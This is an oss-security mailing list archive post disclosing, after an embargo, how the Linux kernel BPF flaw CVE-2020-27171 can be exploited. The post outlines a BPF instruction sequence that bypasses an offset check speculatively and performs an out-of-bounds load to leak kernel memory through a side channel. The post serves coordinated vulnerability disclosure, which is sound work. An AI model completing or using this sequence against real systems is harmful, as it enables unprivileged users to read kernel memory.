<!--X-Body-Begin-->
<!--X-User-Header-->
oss-sec
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->
By Date
By Thread
</form>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
From: Piotr Krysiuk <piotras () gmail com>
Date: Wed, 24 Mar 2021 19:38:11 +0000
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
Some details of how CVE-2020-27171 could be exploited in practice were
provided via linux-distros mailing list with 7 days embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide about any appropriate actions.
As the embargo expires today, I was asked to share these details
publically on oss-security.
The CVE-2020-27171 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for BPF
program attached to a socket:
load pointer to our big array into BPF_REG_MAP_PTR,
load offset of data to leak into BPF_REG_OFFSET,
BPF_MOV64_REG(BPF_REG_OOB_ADDRESS, BPF_REG_MAP_PTR),
// load any slowly-loaded value...
BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),
// ... and turn it into known zero for verifier,
// while preserving slowly-loaded dependency for affected hardware
BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),
// speculatively bypassed offset check
BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
skip_speculation),
// speculatively subtract masked BPF_REG_OFFSET from BPF_REG_OOB_ADDRESS,
// where incorrect mask value 0xffffffff is used due to integer underflow
BPF_ALU64_REG(BPF_SUB, BPF_REG_OOB_ADDRESS, BPF_REG_OFFSET),
// speculatively out-of-bounds load
BPF_LDX_MEM(BPF_B, BPF_REG_LEAKED_BYTE, BPF_REG_OOB_ADDRESS, 0),
transmit speculatively loaded BPF_REG_LEAKED_BYTE via side-channel,
The full reproducers were shared with a number of Linux distributions
for protection purposes.
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
By Date
By Thread
Current thread:
[CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 18)
Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 24)
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->